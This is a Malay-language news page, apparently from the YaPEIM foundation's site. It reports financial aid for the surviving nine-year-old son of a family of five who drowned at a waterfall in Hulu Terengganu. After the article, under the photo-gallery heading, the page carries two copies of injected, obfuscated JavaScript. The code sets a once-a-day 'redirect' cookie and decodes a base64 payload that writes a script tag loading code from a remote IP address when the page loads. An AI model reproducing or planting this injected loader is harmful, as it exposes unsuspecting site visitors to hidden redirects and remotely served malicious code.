YaPEIM » YaPEIM SERAH SUMBANGAN KEPADA WARIS LIMA SEKELUARGA MATI LEMAS

Terkini

YaPEIM SERAH SUMBANGAN KEPADA WARIS LIMA SEKELUARGA MATI LEMAS

YaPEIM menyerahkan sumbangan kewangan kepada waris lima sekeluarga yang mati lemas di Air Terjun Belukar Bukit, Hulu Terengganu.

KLANG – Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) hari ini menyerahkan sumbangan kewangan kepada waris lima sekeluarga yang mati lemas di Air Terjun Belukar Bukit, Hulu Terengganu, Sabtu lepas.

Sumbangan berjumlah RM4,800 itu adalah sebagai bantuan pendidikan kepada anak lelaki tunggal keluarga berkenaan, Mohd Hasif Abdul Halim, 9, yang terselamat dalam tragedi tersebut.

Bantuan disampaikan Ketua Pengarah merangkap Ketua Pegawai Eksekutif Kumpulan YaPEIM, Datuk Abibullah Samsudin kepada ibu saudara kanak-kanak itu, Dr Siti Sabariah Samian.

Abibullah berkata bantuan kewangan itu adalah hasil amal jariah orang ramai yang dikumpul yayasan berkenaan dan ia akan disalurkan secara bulanan iaitu sebanyak RM200 selama dua tahun.

“Sejak program bantuan diperkenalkan pada 2010, sejumlah RM3.7 juta telah kita agihkan kepada 407 keluarga melibatkan 1,252 anak-anak yang kehilangan ibu bapa secara mengejut dalam kemalangan dan sebagainya,” katanya kepada pemberita, di sini hari ini.

Dalam kejadian kira-kira pukul 11.35 pagi Sabtu lepas, ibu bapa Mohd Hasif, Abdul Halim Samian, 44, dan Nurul Adila@Salawati Awang, 39, mati lemas ketika mandi di kawasan rekreasi itu.

Turut lemas, tiga lagi anak pasangan berkenaan, Nurul Arifah, 16, Nurul Aina, 11, dan Nurul Izah, 10. – Bernama

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top